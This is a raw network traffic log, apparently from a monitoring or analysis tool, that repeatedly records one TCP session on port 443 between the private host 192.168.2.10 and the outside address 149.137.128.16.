Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443

Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
